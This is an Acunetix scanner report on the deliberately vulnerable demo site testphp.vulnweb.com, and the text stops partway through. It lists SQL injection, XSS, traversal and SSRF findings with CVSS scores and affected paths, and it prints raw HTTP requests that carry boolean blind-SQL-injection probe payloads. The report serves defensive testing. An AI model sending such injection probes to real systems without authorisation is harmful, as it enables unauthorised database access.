Acunetix Website Audit
13 December, 2016
Developer Report
Generated by Acunetix WVS Reporter (v10.5 Build 20160520)
Scan of http://testphp.vulnweb.com:80/
Scan information
Scan details
Start time 12/13/2016 6:36:48 PM
Finish time 12/13/2016 7:55:50 PM
Scan time 1 hours, 19 minutes
Profile Default
Server information
Responsive True
Server banner nginx/1.4.1
Server OS Unknown
Server technologies PHP
Threat level
Acunetix Threat Level 3
One or more high-severity type vulnerabilities have been discovered by the scanner. Amalicious user can exploit these vulnerabilities and compromise the backend databaseand/or deface your website.
Alerts distribution
High
Medium
Low
Informational 26
8
65
118
217Total alerts found
Knowledge base
Possible registration page
A page where is possible to register a new user account was found at /signup.php.
WordPress web application
WordPress web application was detected in directory /bxss/adminPan3l.
List of file extensions
File extensions can provide information on what technologies are being used on this website.List of file extensions detected: - css => 4 file(s)- gif => 1 file(s)- php => 50 file(s)- swf => 1 file(s)- fla => 1 file(s)- conf => 1 file(s)- htaccess => 1 file(s)- xml => 8 file(s)- htm => 1 file(s)- name => 1 file(s)- iml => 1 file(s)- sql => 1 file(s)- js => 1 file(s)- Log => 1 file(s)- bak => 2 file(s)
2Acunetix Website Audit
- tn => 8 file(s)- txt => 2 file(s)- html => 2 file(s)- LOG => 1 file(s)
List of client scripts
These files contain Javascript code referenced from the website. - /medias/js/common_functions.js
List of files with inputs
These files have at least one input (GET or POST). - / - 1 inputs- /userinfo.php - 4 inputs- /cart.php - 3 inputs- /search.php - 2 inputs- /hpp - 1 inputs- /hpp/params.php - 3 inputs- /hpp/index.php - 1 inputs- /artists.php - 1 inputs- /guestbook.php - 2 inputs- /AJAX/showxml.php - 1 inputs- /AJAX/infoartist.php - 1 inputs- /AJAX/infocateg.php - 1 inputs- /AJAX/infotitle.php - 1 inputs- /Mod_Rewrite_Shop/buy.php - 1 inputs- /Mod_Rewrite_Shop/details.php - 1 inputs- /Mod_Rewrite_Shop/rate.php - 1 inputs- /sendcommand.php - 2 inputs- /listproducts.php - 3 inputs- /product.php - 1 inputs- /showimage.php - 2 inputs- /redir.php - 1 inputs- /secured/newuser.php - 2 inputs- /secured/phpinfo.php - 1 inputs- /comment.php - 6 inputs- /_mmServerScripts/MMHTTPDB.php - 1 inputs- /bxss/vuln.php - 1 inputs
List of external hosts
These hosts were linked from this website but they were not scanned because they are not listed in the list of hostsallowed. (Configuration-> Scan Settings ->Scanning Options-> List of hosts allowed). - box.anchorfree.net- anchorfree.us- a433.com- pixel.quantserve.com- www.google.com- www.acunetix.com- www.eclectasy.com- download.macromedia.com- blog.mindedsecurity.com- hotspotshield.com- www.youtube.com- www.php.net- www.zend.com
Alerts summary
3Acunetix Website Audit
Blind SQL Injection
Classification
Base Score: 6.8 - Access Vector: Network- Access Complexity: Medium- Authentication: None- Confidentiality Impact: Partial- Integrity Impact: Partial- Availability Impact: Partial
CVSS
Base Score: 10 - Attack Vector: Network- Attack Complexity: Low- Privileges Required: None- User Interaction: None- Scope: Changed- Confidentiality Impact: High- Integrity Impact: High- Availability Impact: None
CVSS3
CWE CWE-89
Affected items Variations1/
1/AJAX/infoartist.php
1/AJAX/infocateg.php
1/AJAX/infotitle.php
2/artists.php
3/cart.php
1/guestbook.php
4/listproducts.php
1/Mod_Rewrite_Shop/buy.php
1/Mod_Rewrite_Shop/details.php
1/Mod_Rewrite_Shop/rate.php
2/product.php
5/search.php
1/secured/newuser.php
1/sendcommand.php
8/userinfo.php
4Acunetix Website Audit
Cross site scripting
Classification
Base Score: 6.4 - Access Vector: Network- Access Complexity: Low- Authentication: None- Confidentiality Impact: Partial- Integrity Impact: Partial- Availability Impact: None
CVSS
Base Score: 5.3 - Attack Vector: Network- Attack Complexity: Low- Privileges Required: None- User Interaction: None- Scope: Unchanged- Confidentiality Impact: None- Integrity Impact: Low- Availability Impact: None
CVSS3
CWE CWE-79
Affected items Variations2/showimage.php
Cross site scripting (verified)
Classification
Base Score: 6.4 - Access Vector: Network- Access Complexity: Low- Authentication: None- Confidentiality Impact: Partial- Integrity Impact: Partial- Availability Impact: None
CVSS
Base Score: 5.3 - Attack Vector: Network- Attack Complexity: Low- Privileges Required: None- User Interaction: None- Scope: Unchanged- Confidentiality Impact: None- Integrity Impact: Low- Availability Impact: None
CVSS3
CWE CWE-79
Affected items Variations1/404.php
1/AJAX/showxml.php
1/comment.php
4/guestbook.php
1/hpp/
1/hpp/index.php
4/hpp/params.php
3/listproducts.php
2/search.php
6/secured/newuser.php
10/userinfo.php
5Acunetix Website Audit
Directory traversal (verified)
Classification
Base Score: 6.8 - Access Vector: Network- Access Complexity: Medium- Authentication: None- Confidentiality Impact: Partial- Integrity Impact: Partial- Availability Impact: Partial
CVSS
Base Score: 5.3 - Attack Vector: Network- Attack Complexity: Low- Privileges Required: None- User Interaction: None- Scope: Unchanged- Confidentiality Impact: Low- Integrity Impact: None- Availability Impact: None
CVSS3
CWE CWE-22
Affected items Variations2/showimage.php
Macromedia Dreamweaver remote database scripts
Classification
Base Score: 5.0 - Access Vector: Network- Access Complexity: Low- Authentication: None- Confidentiality Impact: Partial- Integrity Impact: None- Availability Impact: None
CVSS
CWE CWE-16
CVE CVE-2004-1893
Affected items Variations1/
nginx SPDY heap buffer overflow
Classification
Base Score: 5.1 - Access Vector: Network- Access Complexity: High- Authentication: None- Confidentiality Impact: Partial- Integrity Impact: Partial- Availability Impact: Partial
CVSS
CWE CWE-122
CVE CVE-2014-0133
Affected items Variations1Web Server
6Acunetix Website Audit
PHP allow_url_fopen enabled
Classification
Base Score: 0.0 - Access Vector: Network- Access Complexity: Low- Authentication: None- Confidentiality Impact: None- Integrity Impact: None- Availability Impact: None
CVSS
CWE CWE-16
Affected items Variations1Web Server
Script source code disclosure
Classification
Base Score: 5.0 - Access Vector: Network- Access Complexity: Low- Authentication: None- Confidentiality Impact: Partial- Integrity Impact: None- Availability Impact: None
CVSS
CWE CWE-538
Affected items Variations1/showimage.php
Server side request forgery
Classification
Base Score: 5.8 - Access Vector: Network- Access Complexity: Medium- Authentication: None- Confidentiality Impact: Partial- Integrity Impact: Partial- Availability Impact: None
CVSS
Base Score: 9 - Attack Vector: Network- Attack Complexity: High- Privileges Required: None- User Interaction: None- Scope: Changed- Confidentiality Impact: High- Integrity Impact: High- Availability Impact: High
CVSS3
CWE CWE-918
Affected items Variations2/showimage.php
7Acunetix Website Audit
SQL injection
Classification
Base Score: 6.8 - Access Vector: Network- Access Complexity: Medium- Authentication: None- Confidentiality Impact: Partial- Integrity Impact: Partial- Availability Impact: Partial
CVSS
Base Score: 10 - Attack Vector: Network- Attack Complexity: Low- Privileges Required: None- User Interaction: None- Scope: Changed- Confidentiality Impact: High- Integrity Impact: High- Availability Impact: None
CVSS3
CWE CWE-89
Affected items Variations1/
3/cart.php
8Acunetix Website Audit
SQL injection (verified)
Classification
Base Score: 6.8 - Access Vector: Network- Access Complexity: Medium- Authentication: None- Confidentiality Impact: Partial- Integrity Impact: Partial- Availability Impact: Partial
CVSS
Base Score: 10 - Attack Vector: Network- Attack Complexity: Low- Privileges Required: None- User Interaction: None- Scope: Changed- Confidentiality Impact: High- Integrity Impact: High- Availability Impact: None
CVSS3
CWE CWE-89
Affected items Variations1/AJAX/infoartist.php
1/AJAX/infocateg.php
1/AJAX/infotitle.php
2/artists.php
1/guestbook.php
4/listproducts.php
1/Mod_Rewrite_Shop/buy.php
1/Mod_Rewrite_Shop/details.php
1/Mod_Rewrite_Shop/rate.php
2/product.php
5/search.php
1/secured/newuser.php
2/sendcommand.php
13/userinfo.php
.htaccess file readable
Classification
Base Score: 5.0 - Access Vector: Network- Access Complexity: Low- Authentication: None- Confidentiality Impact: Partial- Integrity Impact: None- Availability Impact: None
CVSS
CWE CWE-16
Affected items Variations1/Mod_Rewrite_Shop
9Acunetix Website Audit
Application error message
Classification
Base Score: 5.0 - Access Vector: Network- Access Complexity: Low- Authentication: None- Confidentiality Impact: Partial- Integrity Impact: None- Availability Impact: None
CVSS
Base Score: 7.5 - Attack Vector: Network- Attack Complexity: Low- Privileges Required: None- User Interaction: None- Scope: Unchanged- Confidentiality Impact: High- Integrity Impact: None- Availability Impact: None
CVSS3
CWE CWE-200
Affected items Variations3/listproducts.php
1/secured/newuser.php
2/showimage.php
10/userinfo.php
Backup files
Classification
Base Score: 5.0 - Access Vector: Network- Access Complexity: Low- Authentication: None- Confidentiality Impact: Partial- Integrity Impact: None- Availability Impact: None
CVSS
CWE CWE-538
Affected items Variations1/index.bak
1/index.zip
10Acunetix Website Audit
CRLF injection/HTTP response splitting (verified)
Classification
Base Score: 5.0 - Access Vector: Network- Access Complexity: Low- Authentication: None- Confidentiality Impact: None- Integrity Impact: Partial- Availability Impact: None
CVSS
Base Score: 5.4 - Attack Vector: Network- Attack Complexity: Low- Privileges Required: None- User Interaction: Required- Scope: Unchanged- Confidentiality Impact: Low- Integrity Impact: Low- Availability Impact: None
CVSS3
CWE CWE-113
Affected items Variations1/redir.php
Cross domain data hijacking
Classification
Base Score: 4.4 - Access Vector: Network- Access Complexity: Medium- Authentication: None- Confidentiality Impact: None- Integrity Impact: Partial- Availability Impact: None
CVSS
CWE CWE-20
Affected items Variations2/hpp/params.php
Cross site scripting (content-sniffing)
Classification
Base Score: 6.4 - Access Vector: Network- Access Complexity: Low- Authentication: None- Confidentiality Impact: Partial- Integrity Impact: Partial- Availability Impact: None
CVSS
Base Score: 5.3 - Attack Vector: Network- Attack Complexity: Low- Privileges Required: None- User Interaction: None- Scope: Unchanged- Confidentiality Impact: None- Integrity Impact: Low- Availability Impact: None
CVSS3
CWE CWE-79
Affected items Variations2/showimage.php
11Acunetix Website Audit
Directory listing
Classification
Base Score: 5.0 - Access Vector: Network- Access Complexity: Low- Authentication: None- Confidentiality Impact: Partial- Integrity Impact: None- Availability Impact: None
CVSS
Base Score: 7.5 - Attack Vector: Network- Attack Complexity: Low- Privileges Required: None- User Interaction: None- Scope: Unchanged- Confidentiality Impact: High- Integrity Impact: None- Availability Impact: None
CVSS3
CWE CWE-538
Affected items Variations1/.idea
1/.idea/scopes
1/_mmServerScripts
1/admin
1/Connections
1/CVS
1/Flash
1/images
1/Mod_Rewrite_Shop/images
1/pictures
1/Templates
1/wvstests
1/wvstests/pmwiki_2_1_19
1/wvstests/pmwiki_2_1_19/scripts
12Acunetix Website Audit
Error message on page
Classification
Base Score: 5.0 - Access Vector: Network- Access Complexity: Low- Authentication: None- Confidentiality Impact: Partial- Integrity Impact: None- Availability Impact: None
CVSS
Base Score: 7.5 - Attack Vector: Network- Attack Complexity: Low- Privileges Required: None- User Interaction: None- Scope: Unchanged- Confidentiality Impact: High- Integrity Impact: None- Availability Impact: None
CVSS3
CWE CWE-200
Affected items Variations1/AJAX/infoartist.php
1/AJAX/infocateg.php
1/AJAX/infotitle.php
1/Connections/DB_Connection.php
1/pictures/path-disclosure-unix.html
1/secured/database_connect.php
HTML form without CSRF protection
Classification
Base Score: 2.6 - Access Vector: Network- Access Complexity: High- Authentication: None- Confidentiality Impact: None- Integrity Impact: Partial- Availability Impact: None
CVSS
Base Score: 4.3 - Attack Vector: Network- Attack Complexity: Low- Privileges Required: None- User Interaction: Required- Scope: Unchanged- Confidentiality Impact: None- Integrity Impact: Low- Availability Impact: None
CVSS3
CWE CWE-352
Affected items Variations1/
1/comment.php (7aae61e4ef757b75f29861b71d32976e)
1/hpp (fbc1d56ba0737d3fa577aa5a19c9fd49)
1/signup.php
1/userinfo.php (9d1db3f4d16732c9716e14a3e959fa2d)
13Acunetix Website Audit
HTTP parameter pollution
Classification
Base Score: 5.0 - Access Vector: Network- Access Complexity: Low- Authentication: None- Confidentiality Impact: None- Integrity Impact: Partial- Availability Impact: None
CVSS
Base Score: 9.1 - Attack Vector: Network- Attack Complexity: Low- Privileges Required: None- User Interaction: None- Scope: Unchanged- Confidentiality Impact: High- Integrity Impact: High- Availability Impact: None
CVSS3
CWE CWE-88
Affected items Variations1/hpp/
1/hpp/index.php
Insecure crossdomain.xml file
Classification
Base Score: 5.0 - Access Vector: Network- Access Complexity: Low- Authentication: None- Confidentiality Impact: Partial- Integrity Impact: None- Availability Impact: None
CVSS
Base Score: 6.5 - Attack Vector: Network- Attack Complexity: Low- Privileges Required: None- User Interaction: None- Scope: Unchanged- Confidentiality Impact: Low- Integrity Impact: Low- Availability Impact: None
CVSS3
CWE CWE-284
Affected items Variations1Web Server
14Acunetix Website Audit
JetBrains .idea project directory
Classification
Base Score: 5.0 - Access Vector: Network- Access Complexity: Low- Authentication: None- Confidentiality Impact: Partial- Integrity Impact: None- Availability Impact: None
CVSS
CWE CWE-538
Affected items Variations1/
PHP allow_url_fopen enabled
Classification
Base Score: 0.0 - Access Vector: Network- Access Complexity: Low- Authentication: None- Confidentiality Impact: None- Integrity Impact: None- Availability Impact: None
CVSS
Base Score: 5.3 - Attack Vector: Network- Attack Complexity: Low- Privileges Required: None- User Interaction: None- Scope: Unchanged- Confidentiality Impact: Low- Integrity Impact: None- Availability Impact: None
CVSS3
CWE CWE-16
Affected items Variations1/secured/phpinfo.php
PHP errors enabled
Classification
Base Score: 5.0 - Access Vector: Network- Access Complexity: Low- Authentication: None- Confidentiality Impact: Partial- Integrity Impact: None- Availability Impact: None
CVSS
CWE CWE-16
Affected items Variations1/secured/phpinfo.php
1Web Server
15Acunetix Website Audit
PHP open_basedir is not set
Classification
Base Score: 0.0 - Access Vector: Network- Access Complexity: Low- Authentication: None- Confidentiality Impact: None- Integrity Impact: None- Availability Impact: None
CVSS
Base Score: 5.3 - Attack Vector: Network- Attack Complexity: Low- Privileges Required: None- User Interaction: None- Scope: Unchanged- Confidentiality Impact: Low- Integrity Impact: None- Availability Impact: None
CVSS3
CWE CWE-16
Affected items Variations1/secured/phpinfo.php
PHP session.use_only_cookies disabled
Classification
Base Score: 0.0 - Access Vector: Network- Access Complexity: Low- Authentication: None- Confidentiality Impact: None- Integrity Impact: None- Availability Impact: None
CVSS
CWE CWE-16
Affected items Variations1/secured/phpinfo.php
PHPinfo page
Classification
Base Score: 5.0 - Access Vector: Network- Access Complexity: Low- Authentication: None- Confidentiality Impact: Partial- Integrity Impact: None- Availability Impact: None
CVSS
Base Score: 7.5 - Attack Vector: Network- Attack Complexity: Low- Privileges Required: None- User Interaction: None- Scope: Unchanged- Confidentiality Impact: High- Integrity Impact: None- Availability Impact: None
CVSS3
CWE CWE-200
Affected items Variations1/secured/phpinfo.php
16Acunetix Website Audit
PHPinfo page found
Classification
Base Score: 5.0 - Access Vector: Network- Access Complexity: Low- Authentication: None- Confidentiality Impact: Partial- Integrity Impact: None- Availability Impact: None
CVSS
Base Score: 7.5 - Attack Vector: Network- Attack Complexity: Low- Privileges Required: None- User Interaction: None- Scope: Unchanged- Confidentiality Impact: High- Integrity Impact: None- Availability Impact: None
CVSS3
CWE CWE-200
Affected items Variations1/secured/phpinfo.php
Source code disclosure
Classification
Base Score: 5.0 - Access Vector: Network- Access Complexity: Low- Authentication: None- Confidentiality Impact: Partial- Integrity Impact: None- Availability Impact: None
CVSS
Base Score: 7.5 - Attack Vector: Network- Attack Complexity: Low- Privileges Required: None- User Interaction: None- Scope: Unchanged- Confidentiality Impact: High- Integrity Impact: None- Availability Impact: None
CVSS3
CWE CWE-538
Affected items Variations1/index.bak
1/pictures/wp-config.bak
17Acunetix Website Audit
URL redirection
Classification
Base Score: 6.4 - Access Vector: Network- Access Complexity: Low- Authentication: None- Confidentiality Impact: Partial- Integrity Impact: Partial- Availability Impact: None
CVSS
Base Score: 0 - Attack Vector: Network- Attack Complexity: Low- Privileges Required: None- User Interaction: None- Scope: Unchanged- Confidentiality Impact: None- Integrity Impact: None- Availability Impact: None
CVSS3
CWE CWE-601
Affected items Variations1/redir.php
User credentials are sent in clear text
Classification
Base Score: 5.0 - Access Vector: Network- Access Complexity: Low- Authentication: None- Confidentiality Impact: Partial- Integrity Impact: None- Availability Impact: None
CVSS
Base Score: 9.1 - Attack Vector: Network- Attack Complexity: Low- Privileges Required: None- User Interaction: None- Scope: Unchanged- Confidentiality Impact: High- Integrity Impact: High- Availability Impact: None
CVSS3
CWE CWE-310
Affected items Variations1/signup.php
WS_FTP log file found
Classification
Base Score: 5.0 - Access Vector: Network- Access Complexity: Low- Authentication: None- Confidentiality Impact: Partial- Integrity Impact: None- Availability Impact: None
CVSS
CWE CWE-538
Affected items Variations1/pictures//WS_FTP.LOG
18Acunetix Website Audit
Clickjacking: X-Frame-Options header missing
Classification
Base Score: 6.8 - Access Vector: Network- Access Complexity: Medium- Authentication: None- Confidentiality Impact: Partial- Integrity Impact: Partial- Availability Impact: Partial
CVSS
CWE CWE-693
Affected items Variations1Web Server
Cookie(s) without HttpOnly flag set
Classification
Base Score: 0.0 - Access Vector: Network- Access Complexity: Low- Authentication: None- Confidentiality Impact: None- Integrity Impact: None- Availability Impact: None
CVSS
CWE CWE-16
Affected items Variations1/
Hidden form input named price was found
Classification
Base Score: 0.0 - Access Vector: Network- Access Complexity: Low- Authentication: None- Confidentiality Impact: None- Integrity Impact: None- Availability Impact: None
CVSS
CWE CWE-16
Affected items Variations1/product.php (68db51598a6b1e726aa518e093bbd4ff)
MySQL username disclosure
Classification
Base Score: 0.0 - Access Vector: Network- Access Complexity: Low- Authentication: None- Confidentiality Impact: None- Integrity Impact: None- Availability Impact: None
CVSS
CWE CWE-538
Affected items Variations1/Connections/DB_Connection.php
1/secured/database_connect.php
19Acunetix Website Audit
Possible sensitive directories
Classification
Base Score: 5.0 - Access Vector: Network- Access Complexity: Low- Authentication: None- Confidentiality Impact: Partial- Integrity Impact: None- Availability Impact: None
CVSS
Base Score: 7.5 - Attack Vector: Network- Attack Complexity: Low- Privileges Required: None- User Interaction: None- Scope: Unchanged- Confidentiality Impact: High- Integrity Impact: None- Availability Impact: None
CVSS3
CWE CWE-200
Affected items Variations1/admin
1/CVS
1/secured
Broken links
Classification
Base Score: 0.0 - Access Vector: Network- Access Complexity: Low- Authentication: None- Confidentiality Impact: None- Integrity Impact: None- Availability Impact: None
CVSS
CWE CWE-16
Affected items Variations1/medias/css/main.css
1/medias/js/common_functions.js
1/Mod_Rewrite_Shop/Details/color-printer/3
1/Mod_Rewrite_Shop/Details/network-attached-storage-dlink/1
1/Mod_Rewrite_Shop/Details/web-camera-a4tech/2
1/privacy.php
1/secured/office_files/filelist.xml
1/Templates/logout.php
20Acunetix Website Audit
Email address found
Classification
Base Score: 5.0 - Access Vector: Network- Access Complexity: Low- Authentication: None- Confidentiality Impact: Partial- Integrity Impact: None- Availability Impact: None
CVSS
Base Score: 7.5 - Attack Vector: Network- Attack Complexity: Low- Privileges Required: None- User Interaction: None- Scope: Unchanged- Confidentiality Impact: High- Integrity Impact: None- Availability Impact: None
CVSS3
CWE CWE-200
Affected items Variations1/
GHDB: Default phpinfo page
Affected items Variations1/secured/phpinfo.php
GHDB: phpinfo()
Affected items Variations1/secured/phpinfo.php
GHDB: Sablotron error message
Affected items Variations1/pictures/path-disclosure-unix.html
GHDB: SQL error message
Affected items Variations1/Connections/DB_Connection.php
1/secured/database_connect.php
21Acunetix Website Audit
Microsoft Office possible sensitive information
Classification
Base Score: 5.0 - Access Vector: Network- Access Complexity: Low- Authentication: None- Confidentiality Impact: Partial- Integrity Impact: None- Availability Impact: None
CVSS
Base Score: 7.5 - Attack Vector: Network- Attack Complexity: Low- Privileges Required: None- User Interaction: None- Scope: Unchanged- Confidentiality Impact: High- Integrity Impact: None- Availability Impact: None
CVSS3
CWE CWE-200
Affected items Variations1/secured/office.htm
Password type input with auto-complete enabled
Classification
Base Score: 0.0 - Access Vector: Network- Access Complexity: Low- Authentication: None- Confidentiality Impact: None- Integrity Impact: None- Availability Impact: None
CVSS
Base Score: 7.5 - Attack Vector: Network- Attack Complexity: Low- Privileges Required: None- User Interaction: None- Scope: Unchanged- Confidentiality Impact: High- Integrity Impact: None- Availability Impact: None
CVSS3
CWE CWE-200
Affected items Variations2/login.php
Possible CSRF (Cross-site request forgery)
Affected items Variations1/AJAX/infotitle.php
22Acunetix Website Audit
Possible internal IP address disclosure
Classification
Base Score: 5.0 - Access Vector: Network- Access Complexity: Low- Authentication: None- Confidentiality Impact: Partial- Integrity Impact: None- Availability Impact: None
CVSS
Base Score: 7.5 - Attack Vector: Network- Attack Complexity: Low- Privileges Required: None- User Interaction: None- Scope: Unchanged- Confidentiality Impact: High- Integrity Impact: None- Availability Impact: None
CVSS3
CWE CWE-200
Affected items Variations1/404.php
1/pictures/ipaddresses.txt
1/secured/phpinfo.php
Possible server path disclosure (Unix)
Classification
Base Score: 5.0 - Access Vector: Network- Access Complexity: Low- Authentication: None- Confidentiality Impact: Partial- Integrity Impact: None- Availability Impact: None
CVSS
Base Score: 7.5 - Attack Vector: Network- Attack Complexity: Low- Privileges Required: None- User Interaction: None- Scope: Unchanged- Confidentiality Impact: High- Integrity Impact: None- Availability Impact: None
CVSS3
CWE CWE-200
Affected items Variations1/pictures/path-disclosure-unix.html
1/secured/phpinfo.php
23Acunetix Website Audit
Possible username or password disclosure
Classification
Base Score: 5.0 - Access Vector: Network- Access Complexity: Low- Authentication: None- Confidentiality Impact: Partial- Integrity Impact: None- Availability Impact: None
CVSS
Base Score: 7.5 - Attack Vector: Network- Attack Complexity: Low- Privileges Required: None- User Interaction: None- Scope: Unchanged- Confidentiality Impact: High- Integrity Impact: None- Availability Impact: None
CVSS3
CWE CWE-200
Affected items Variations1/Connections/DB_Connection.php
1/pictures/credentials.txt
1/secured/database_connect.php
24Acunetix Website Audit
Alert details
Blind SQL Injection
HighSeverity
ValidationType
Scripting (Blind_Sql_Injection.script)Reported by module
Description
This script is possibly vulnerable to SQL Injection attacks. SQL injection is a vulnerability that allows an attacker to alter back-end SQL statements by manipulating the user input.An SQL injection occurs when web applications accept user input that is directly placed into a SQL statement and doesn'tproperly filter out dangerous characters. This is one of the most common application layer attacks currently being used on the Internet. Despite the fact that it isrelatively easy to protect against, there is a large number of web applications vulnerable.
Impact
An attacker may execute arbitrary SQL statements on the vulnerable system. This may compromise the integrity of yourdatabase and/or expose sensitive information. Depending on the back-end database in use, SQL injection vulnerabilities lead to varying levels of data/system accessfor the attacker. It may be possible to not only manipulate existing queries, but to UNION in arbitrary data, use subselects, or append additional queries. In some cases, it may be possible to read in or write out to files, or to execute shellcommands on the underlying operating system. Certain SQL Servers such as Microsoft SQL Server contain stored and extended procedures (database serverfunctions). If an attacker can obtain access to these procedures it may be possible to compromise the entire machine.
Recommendation
Your script should filter metacharacters from user input. Check detailed information for more information about fixing this vulnerability.
References
SQL Injection Walkthrough
VIDEO: SQL Injection tutorial
OWASP PHP Top 5
OWASP Injection Flaws
Acunetix SQL Injection Attack
How to check for SQL injection vulnerabilities
Affected items
/
Details
Cookie input login was set to test%2Ftest' AND 3*2*1=6 AND '000hbBO'='000hbBO Tests performed: - test%2Ftest' AND 2*3*8=6*8 AND '000hbBO'='000hbBO => TRUE- test%2Ftest' AND 2*3*8=6*9 AND '000hbBO'='000hbBO => FALSE- test%2Ftest' AND 3*3<(2*4) AND '000hbBO'='000hbBO => FALSE- test%2Ftest' AND 3*2>(1*5) AND '000hbBO'='000hbBO => TRUE- test%2Ftest' A ... (line truncated)
GET / HTTP/1.1
Cookie: login=test%2Ftest'%20AND%203*2*1=6%20AND%20'000hbBO'='000hbBO;
PHPSESSID=c3e1qcecc963h1hoij3o57aik0; OAID=X3285C893B9A5D126A7E0F8151CC99234;
mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Request headers
25Acunetix Website Audit
X-Requested-With: XMLHttpRequest
Referer: http://testphp.vulnweb.com:80/
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
/AJAX/infoartist.php
Details
URL encoded GET input id was set to 3 AND 3*2*1=6 AND 573=573 Tests performed: - 1*1*1*3 => TRUE- 3*573*568*0 => FALSE- 13*5*2*999 => FALSE- 3*1*1 => TRUE- 1*1*1*1*1*3 => TRUE- 13*1*1*0*1*1*573 => FALSE- 3 AND 5*4=20 AND 573=573 => TRUE- 3 AND 5*4=21 AND 573=573 => FALSE... (line truncated)
GET /AJAX/infoartist.php?id=3%20AND%203*2*1=6%20AND%20573=573 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
/AJAX/infocateg.php
Details
URL encoded GET input id was set to 3 AND 3*2*1=6 AND 704=704 Tests performed: - 1*1*1*3 => TRUE- 3*704*699*0 => FALSE- 13*5*2*999 => FALSE- 3*1*1 => TRUE- 1*1*1*1*1*3 => TRUE- 13*1*1*0*1*1*704 => FALSE- 3 AND 5*4=20 AND 704=704 => TRUE- 3 AND 5*4=21 AND 704=704 => FALSE... (line truncated)
GET /AJAX/infocateg.php?id=3%20AND%203*2*1=6%20AND%20704=704 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Request headers
26Acunetix Website Audit
Accept: */*
/AJAX/infotitle.php
Details
URL encoded POST input id was set to 3 AND 3*2*1=6 AND 459=459 Tests performed: - 1*1*1*3 => TRUE- 3*459*454*0 => FALSE- 13*5*2*999 => FALSE- 3*1*1 => TRUE- 1*1*1*1*1*3 => TRUE- 13*1*1*0*1*1*459 => FALSE- 3 AND 5*4=20 AND 459=459 => TRUE- 3 AND 5*4=21 AND 459=459 => FALSE[/li ... (line truncated)
POST /AJAX/infotitle.php HTTP/1.1
Content-Length: 36
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
id=3%20AND%203*2*1=6%20AND%20459=459
Request headers
/artists.php
Details
URL encoded GET input artist was set to 3 AND 3*2*1=6 AND 473=473 Tests performed: - 1*1*1*3 => TRUE- 3*473*468*0 => FALSE- 13*5*2*999 => FALSE- 3*1*1 => TRUE- 1*1*1*1*1*3 => TRUE- 13*1*1*0*1*1*473 => FALSE- 3 AND 5*4=20 AND 473=473 => TRUE- 3 AND 5*4=21 AND 473=473 => FALSE[ ... (line truncated)
GET /artists.php?artist=3%20AND%203*2*1=6%20AND%20473=473 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://testphp.vulnweb.com:80/
Cookie: login=test%2Ftest; PHPSESSID=c3e1qcecc963h1hoij3o57aik0;
OAID=X3285C893B9A5D126A7E0F8151CC99234; mc=584fcf45-4aa21-c487e-27875;
NID=91=Y_WWQPL3auOM11w5SyO1vD6xQ7zUTGbOTWzlGXB_2pBSV5pco0tsgTGZOmmGkxGTxZuxSQ4eq6mpFHZPe
08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk; mycookie=3
Host: testphp.vulnweb.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Request headers
/artists.php
27Acunetix Website Audit
Details
